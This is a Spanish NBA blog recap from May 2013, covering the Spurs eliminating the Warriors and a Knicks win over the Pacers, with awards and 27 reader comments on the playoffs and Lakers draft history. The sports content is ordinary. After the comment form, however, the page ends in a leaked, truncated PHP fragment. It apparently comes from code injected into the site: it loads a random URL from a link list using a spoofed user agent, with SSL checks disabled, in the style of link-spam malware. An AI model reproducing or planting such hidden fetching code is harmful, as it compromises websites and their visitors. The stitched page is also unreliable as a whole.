La Crónica: Fin de trayecto para los Warriors

17 de May de 2013 por Viva_Dirk

DuncanLos Spurs pusieron anoche fin a la temporada de los Warriors en su propia casa. Los de Mark Jackson dieron la sensación de equipo exhausto, con Stephen Curry jugando al límite de su físico, David Lee forzando para jugar 12 míseros minutos y Bogut pudiendo disputar solo 20. Pero a parte de esto, lo de ayer es una historia que debería sonarnos: los Spurs de Duncan acabando con la temporada del equipo de moda, de los más molones, de los que… han ganado estos Spurs más que flores hay en el campo. El partido de ayer es un reflejo de lo que son capaces estos Spurs frente a equipos que los superarían con un ritmo de juego alto, dejarlos en menos de un 40% de acierto.

En términos individuales, Duncan fue el máximo anotador de su equipo con 19 puntos, Kawhi Leonard firmó el único doble-doble del partido y todos los integrantes del quinteto consiguieron dobles dígitos de anotación. Parker y Ginóbili tuvieron un horrible día de cara al aro y sumaron un 4 de 22 en tiros, pero entre ambos repartieron 19 asistencias, una más que todos los Warriors juntos. Por los de Oakland, Curry necesitó 25 tiros para anotar 22 puntos y no forzó ningún tiro libre, Landry y Jack estuvieron bien desde el banco pero nadie pudo lucir en un ‘partido Popovich’, un lugar no apto para rookies por muy buenos que sean, como lo es Harrison Barnes. El encuentro se decidió en los minutos finales, marcados por una jugada maestra del técnico de los Spurs: sentó a Duncan a falta de 4:30, con 77-75 en el marcador, y jugó un small-ball que se tradujo en tres triples casi consecutivos y un parcial de 17-7 que sirvió para cerrar el partido y la eliminatoria (94-82). El domingo a las 21h30, primer asalto entre Spurs y Grizzlies por el título del Oeste.

En el Madison, los Knicks consiguieron una trabajada victoria para seguir vivos. El partido fue realmente feo, con pobres porcentajes de anotación y un ritmo de juego realmente bajo. En este escenario, los 10 balones que perdieron los Knicks frente a los 19 de sus rivales resultaron claves al final del choque. Carmelo fue, esta vez sí, un factor diferencial, ya que pese a seguir sin encontrar su mejor juego fue capaz de anotar con cierta solvencia: sus 28 puntos son un tercio de la anotación total de su equipo. Woodson devolvió a Prigioni al quinteto inicial, Felton sigue con su buen nivel en la serie y ayer completó un gran partido, y el factor X que tantas veces se necesita para llevarse un partido igualado fue Chris Copeland, que en 20 minutos de juego anotó 13 puntos con un alto porcentaje de acierto. Por los Pacers, solo George y West dieron la cara en un partido que parecía más propicio para las virtudes de los Pacers, pero fuera de ellos dos, el resto del equipo solo anotó 11 canastas en juego con un 32% de acierto. La baja de última hora de George Hill, por un golpe recibido en el anterior encuentro, y los errores en los tiros libres (19 de 33) pesaron demasiado a los Pacers (75-85). La madrugada del sábado al domingo (2h00), sexto encuentro de la serie. 

PREMIOS

Melo GeorgeMVP: Tim Duncan dio el do de pecho en la primera parte y tras el descanso cogió el relevo Kawhi Leonard. Fueron los dos jugadores más destacados de los Spurs con 19 puntos y 16 puntos, respectivamente. Carmelo Anthony llegó a los 28 puntos a pesar de tener a la defensa de los Pacers concretada plenamente en él.

Sorpresa: Thiago Splitter jugó su mejor partido en los Playoffs con 14 puntos y 4 rebotes y una gran defensa de su zona. En NY apareció Chris Copeland para paliar la falta de anotación más allá de Carmelo. Anotó 13 puntos en 19 minutos.

Decepción: Jason Kidd sumó un partido más sin anotar un tiro de campo. Klay Thompson volvió a sufrir un mal día y se quedó en 10 puntos y 3 pérdidas en la eliminación de los Warriors.

Esfuerzo en vano: Los protagonistas habituales de Pacers y Warriors se llevan el premio. Por un lado, Paul George, que acabó el partido con 23 puntos, 6 rebotes y 6 asistencias. Por el otro, Stephen Curry, que dice adiós a la temporada con 22 puntos, 4 rebotes y 6 asistencias.

TOP 5

Imágenes | AP Photos / Getty Images

Comenta

27 comentarios a esta entrada

  1. Simon dice:
    #1

    No me gustan mucho los Knicks ( ni por estilo ni historicamente ) y por eso no los sigo mucho. los pocos partidos que les he visto esta temporada completos este Copeland.no ha jugado mucho… pero cada.vez que tiene minutos.anota un monton y con buenos porcentajes. Alguien da unos apuntes.básicos sobre él? esq me resulta un jugador cuyo rendimiengo me resulta muy curioso.

      Citar

  2. MagicJohnson32 dice:
    #2

    Simon:
    No me gustan mucho los Knicks ( ni por estilo ni historicamente ) y por eso no los sigo mucho. los pocos partidos que les he visto esta temporada completos este Copeland.no ha jugado mucho… pero cada.vez que tiene minutos.anota un monton y con buenos porcentajes. Alguien da unos apuntes.básicos sobre él? esq me resulta un jugador cuyo rendimiengo me resulta muy curioso.

    Se le ven condiciones de muy buen anotador, tiene clase, buena técnica de tiro y potencial, pero presenta lagunas en casi todo lo demás. En defensa es muy flojo y en ataque no genera para los demás y toma malas decisiones, aunque hay que tener en cuenta que es rookie, así que estas carencias son normales y el margen de mejora es grande. En un equipo con Melo y JR es difícil que tenga un papel importante, así que normalmente ha tenido protagonismo sólo en minutos de la basura a lo largo de la temporada, y en esos momentos en los que las defensas se relajan es relativamente fácil destacar para un jugador como él.

      Citar

  3. MagicJohnson32 dice:
    #3

    Menuda exhibición de Popovich, qué manera de marcar diferencias desde el banquillo con ajustes tanto entre partidos como sobre la marcha. Primero, hay que ver cómo ha conseguido frenar a los exteriores de los Warriors, en especial a Klay Thompson tras su bestial 2º partido. Leonard se lo ha acabado merendando. Y lo que hace Popo anoche sentando a Duncan al final, con el partido igualado, es increíble. A continuación, triple desde la esquina de Parker, triple desde la esquina de Leonard y triple desde la esquina de Parker. Y adiós Warriors.

      Citar

  4. txusma dice:
    #4

    MagicJohnson32: Se le ven condiciones de muy buen anotador, tiene clase, buena técnica de tiro y potencial, pero presenta lagunas en casi todo lo demás. En defensa es muy flojo y en ataque no genera para los demás y toma malas decisiones, aunque hay que tener en cuenta que es rookie, así que estas carencias son normales y el margen de mejora es grande. En un equipo con Melo y JR es difícil que tenga un papel importante, así que normalmente ha tenido protagonismo sólo en minutos de la basura a lo largo de la temporada, y en esos momentos en los que las defensas se relajan es relativamente fácil destacar para un jugador como él.

    Chris Copeland tiene 29 años así que no creo q tenga margen de mejora. Jugó en el CB Hospitalet de la liga LEB en 2008, creo.

      Citar

  5. GreenPride dice:
    #5

    Pues final esperado para los Warriors ante los Spurs. Se veía venir que la eliminatoria se iba venciendo del lado de los Spurs. Para hacerlo Pop ha tirado de manual y de defensa de sus chicos para tras los dos primeros partidos en los que Curry&Thompson les maltrataron irlos metiendo en vereda hasta maniatarlos todo lo posible a ambos. Toda una lección de estos Spurs y como postre la jugada final de sentar a Duncan para matar el partido con los triples desde las esquinas, hay que meterlos pero fueron tres triples casi sólos productos de la idea de jugar el small-ball en ese momento.
    Con Lee muy mermado, Bogut fuera del partido y Curry y Thompson controlados, en realidad el partido fue un “quiero y no puedo” por parte de unos Warriors que veían como les costaba a horrores atacar mientras los Spurs se hartaban de meter canastas fáciles al otro lado ¿verdad Splitter?
    Gran serie por parte de San Antonio que ha sabido dar la vuelta a su inferioridad durante los dos primeros encuentros para acabar mandando clarmente en las series. Una pena para estos Warriors, pero esto debería ser sólo el inicio de un equipo que se presume tremendo con Curry, Thompson, Barnes, Green y Ezeli en el inicio de sus carreras y Lee todavía con mucha cuerda por delante el futuro llama a la puerta de este equipo a poco que les respeten las lesiones y se anden con un poco de maña en el mercado.
    Para los Spurs viene otra gran lucha, la que les toca ahora contra Memphis. Aquí van a tener que cambiar el chip, de denfender a los peligrosisimos exteriores de los de Golden State a vérselas con la mejor pareja intenrior de la NBA y con una defensa tan molesta y pegajosa como la que más. De quien gane la lucha en la pintura puede depender la serie (en realidad la lucha interior la ganará Memphis pero la duda es por cuanto y si será suficiente con la ventaja que saquen de ahí para ganar las series)…

      Citar

  6. MagicJohnson32 dice:
    #6

    txusma: Chris Copeland tiene 29 años así que no creo q tenga margen de mejora. Jugó en el CB Hospitalet de la liga LEB en 2008, creo.

    No margen de mejora por la edad sino porque es su primer año en la liga. Yo espero que corrija ciertas cosas.

      Citar

  7. Laker1624 dice:
    #7

    Indiana creo que tiene un potencial ofensivo bastante bajo para poder eliminar a Miami en el caso de que llegaran a cruzarse en la final del este, por juego interior y nivel defensivo pienso que pueden plantar cara a los Heat, pero en mi opinión les falta capacidad anotadora para llegar a las finales. En cuanto a los Spurs, les veo eliminando a los Grizzlies, para mi San Antonio tiene mas alternativas exteriores en ataque, y aunque pienso que la defensa de Memphis es muy buena tanto por fuera como por dentro, creo que la línea exterior no podrá aportar lo suficiente ofensivamente hablando, y tampoco veo a Marc y Zach dominando la pintura como lo hicieron contra los Thunder, lo digo mas que nada porque ahora tendrán enfrente a Tim Duncan.

      Citar

  8. MagicJohnson32 dice:
    #8

    Hoy se cumplen 33 años de ESTO: http://www.youtube.com/watch?v=au7WJbus5BM

      Citar

  9. Laker1624 dice:
    #9

    Y si no lo digo mal, esto fue siendo rookie nada mas y nada menos. Creo que será difícil que volvamos a ver algo así de un jugador de primer año.

      Citar

  10. MagicJohnson32 dice:
    #10

    Laker1624:
    Y si no lo digo mal, esto fue siendo rookie nada mas y nada menos. Creo que será difícil que volvamos a ver algo así de un jugador de primer año.

    Efectivamente. Y quien no haya visto el partido, es muy fácil encontrarlo para descarga y realmente vale la pena porque es uno de esos momentos imprescindibles en la historia del baloncesto.

      Citar

  11. Laker1624 dice:
    #11

    Por partidos como estos (y muchas mas cosas) considero a Magic Johnson un Top 3 de los jugadores mas completos de la historia. La figura de Magic Johnson me hace pensar en el debate sobre el mejor jugador de la historia de los Lakers. Creo que bastante gente considera a Bryant el mejor laker de la historia, algo en lo que no estoy de acuerdo. Teniendo en cuenta lo que cada jugador ha dado a la franquicia y la importancia que ha tenido en cada uno de esos logros, considero a Magic el mejor laker de siempre.

      Citar

  12. rumbero dice:
    #12

    MagicJohnson32: Efectivamente. Y quien no haya visto el partido, es muy fácil encontrarlo para descarga y realmente vale la pena porque es uno de esos momentos imprescindibles en la historia del baloncesto.

    Palabras mayores. La exhibición de las exhibiones, sólo le faltó repartir las toallas y aguas. Y como dice Laker1624 siendo rookie y con unos Sixers delante con gente como Erving, Cheeks y la bestia parda de Dawkins. Casi nada. (Por cierto que creo haber leido por ahi que la lesión de Jabbar fue por pisar a….Lionel Hollins)

      Citar

  13. rumbero dice:
    #13

    Yendo a la crónica muy de acuerdo con lo de Pop y sus ajustes. Se ha notado claramente la diferencia entre los 2 primeros partidos y el resto de partidos (tobillos de Curry y Bogut aparte). No suelen salir en la portada pero la serie de Green y Leonard ha sido una pasada. Jugadores made in Popovich, con mención especial para el último que para mi es un jugador de los buenos

      Citar

  14. Denise dice:
    #14

    MagicJohnson32:
    Hoy se cumplen 33 años de ESTO: http://www.youtube.com/watch?v=au7WJbus5BM

    Pues dio muy pocas asistencias…

      Citar

  15. Denise dice:
    #15

    Una pregunta para los mas sabios ó viejos…

    Leo que Magic es elegido nº1 del Draft ya que Lakers traspasan a un tal Goodrich a Hornets a cambio del pick 1

    Este traspaso, era por qué Lakers sabía que Magic despuntaba tanto en la universidad que se podía predecir que sería muy muy bueno? ó simplemente fue un traspaso más como tantos otros que hay pero tuvieron mucha suerte con toparse con ese crack?

      Citar

  16. Laker1624 dice:
    #16

    Yo por mi parte no puedo darte la respuesta a esta pregunta por falta de conocimiento, pero puedo aportar algún dato sobre el asunto. Tengo entendido que Goodrich fue un gran anotador en los Lakers de principios de los 70, y si no me equivoco llego a ser máximo anotador del equipo en una ocasión como mínimo, y eso jugando con gente como Chamberlain y West. Supongo que por la época en que lo traspasaron ya estaría en la recta final de su carrera. En cuanto a lo de Magic, creo que ya despuntaba en su etapa universitaria, es decir, que ya apuntaba maneras. De hecho diría que ya había tenido algún duelo universitario de nivel con Larry Bird.

    Desconocía el hecho de que traspasaran a Goodrich a los Hornets por la 1ª elección del draft. Me parece bastante similar respecto al caso de Kobe, cuando traspasaron a Divac a los Hornets por la elección núm. 13 del draft si no recuerdo mal.

      Citar

  17. Laker1624 dice:
    #17

    Acabo de buscar información respecto al tema, creo que no estaba hablando del mismo Goodrich que estuvo involucrado en la operación de Magic. O a lo mejor directamente no hubo ningún Goodrich en este traspaso, ni idea…

      Citar

  18. Denise dice:
    #18

    Según la entrada de Magic en Wikipedia….
    “Fue elegido como número 1 en el Draft de la NBA de 1979 por Los Angeles Lakers, los cuales habían obtenido esta posibilidad tras negociar con New Orleans Jazz y ofrecerles a la entonces estrella Gail Goodrich a cambio de la primera elección del draft”

      Citar

  19. Denise dice:
    #19

    Laker1624:
    Desconocía el hecho de que traspasaran a Goodrich a los Hornets por la 1ª elección del draft. Me parece bastante similar respecto al caso de Kobe, cuando traspasaron a Divac a los Hornets por la elección núm. 13 del draft si no recuerdo mal.

    Ya, pero lo de Kobe…si fue el pick 13 y hubo 12 equipos que se lo saltaron, supongo que fue pura casualidad y suerte para Lakers que saliera así de bueno, pero lo que me refiero es si lo de Magic fue buscado a proposito.
    Por ejemplo como si el año que viene los Heat (por poner un ejemplo) traspasan a saco a Wade al equipo que tenga el pick 1 para hacerse con el tal Andrew Wiggins que ya dicen que va a ser un crack de los gordos.

      Citar

  20. MagicJohnson32 dice:
    #20

    Denise:
    Una pregunta para los mas sabios ó viejos…

    Leo que Magic es elegido nº1 del Draft ya que Lakers traspasan a un tal Goodrich a Hornets a cambio del pick 1

    Este traspaso, era por qué Lakers sabía que Magic despuntaba tanto en la universidad que se podía predecir que sería muy muy bueno? ó simplemente fue un traspaso más como tantos otros que hay pero tuvieron mucha suerte con toparse con ese crack?

    Pues es un tema curioso y creo que no muy conocido. La elección de Magic en el draft fue una de las condiciones que pidió Jerry Buss en el acuerdo de compra de los Lakers a Cook, el hasta entonces propietario de la franquicia. Buss se encargó desde el primer día de que Magic, que siempre había jugado en casa, se sintiese a gusto en L.A.

    Y vaya si lo consiguió.

      Citar

  21. rumbero dice:
    #21

    Denise: Ya, pero lo de Kobe…si fue el pick 13 y hubo 12 equipos que se lo saltaron, supongo que fue pura casualidad y suerte para Lakers que saliera así de bueno, pero lo que me refiero es si lo de Magic fue buscado a proposito.
    Por ejemplo como si el año que viene los Heat (por poner un ejemplo) traspasan a saco a Wade al equipo que tenga el pick 1 para hacerse con el tal Andrew Wiggins que ya dicen que va a ser un crack de los gordos.

    Los Lakers traspasaron a Goodrich en el 76 a los New Orleans Jazz. De ese traspaso se llevaron a cambio 3 primeras rondas, una de ellas la del 79. Esos Jazz fueron el peor equipo del 78 así que iban a tener buena elección… pero lo bueno es que en esa época se jugaban el primer pick a cara o cruz (true story). Se lo jugaron contra los Bulls que fue el peor equipo de su división. Estos escogieron cara…..salió cruz.

      Citar

  22. Denise dice:
    #22

    Muy buenas anecdotas…lo del cara o cruz era surrealista.

      Citar

  23. MagicJohnson32 dice:
    #23

    De hecho, la elección de Worthy es una historia casi idéntica: traspaso con los Cavs, que quedan últimos en el 82, y sorteo a cara o cruz que los Lakers ganan a los San Diego Clippers. Los Lakers eligen con el 1 a Worthy, y los Clippers con el 2 a Terry Cummings.

      Citar

  24. MagicJohnson32 dice:
    #24

    Denise: Ya, pero lo de Kobe…si fue el pick 13 y hubo 12 equipos que se lo saltaron, supongo que fue pura casualidad y suerte para Lakers que saliera así de bueno, pero lo que me refiero es si lo de Magic fue buscado a proposito.
    Por ejemplo como si el año que viene los Heat (por poner un ejemplo) traspasan a saco a Wade al equipo que tenga el pick 1 para hacerse con el tal Andrew Wiggins que ya dicen que va a ser un crack de los gordos.

    Lo de Kobe no fue casualidad ni suerte, sino el ojo de Jerry West, que se quedó prendado de Bryant en unos workouts. Que Divac era muy bueno, eh, no sueltas a un jugador como él porque sí.

      Citar

  25. GreenPride dice:
    #25

    Y ahora recuerdo a todos que ese año el Magic novato no ganó el ROY sino que lo ganó otro jugador también muy conocido….. si si ese Larry Bird que tantos buenos momentos dejó en sus luchas contra Magic. La historia de Bird en el draft también es muy curiosa ya que fue elegido el el draft un año antes de ir a la NBA y luego se tiró otro año en la universidad algo que hoy en día no se puede hacer. Historias interesantes sobre rookies que luego han sido las estrellas de este juego

      Citar

  26. Sancho88 dice:
    #26

    JAJAJAJ, ahí está el Pato!! de Indiana. Oye, partido de mierda para ser un sexto de la serie… mierda del Este. Stephenson el mejor del partido, con eso está todo dicho. Bueno, y Hibbert, que se come a los interiores de NY. A ver si por aquello de la épica se van al séptimo en el Madison, pero no creo

      Citar

  27. Sancho88 dice:
    #27

    4 triples consecutivos de NY en un minuto… acojonante. empate a 72, 3 seguidos de Shumpert, y hasta JR se suma a la fiesta. Estos Knicks son imprebisibles… viva el small ball!!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>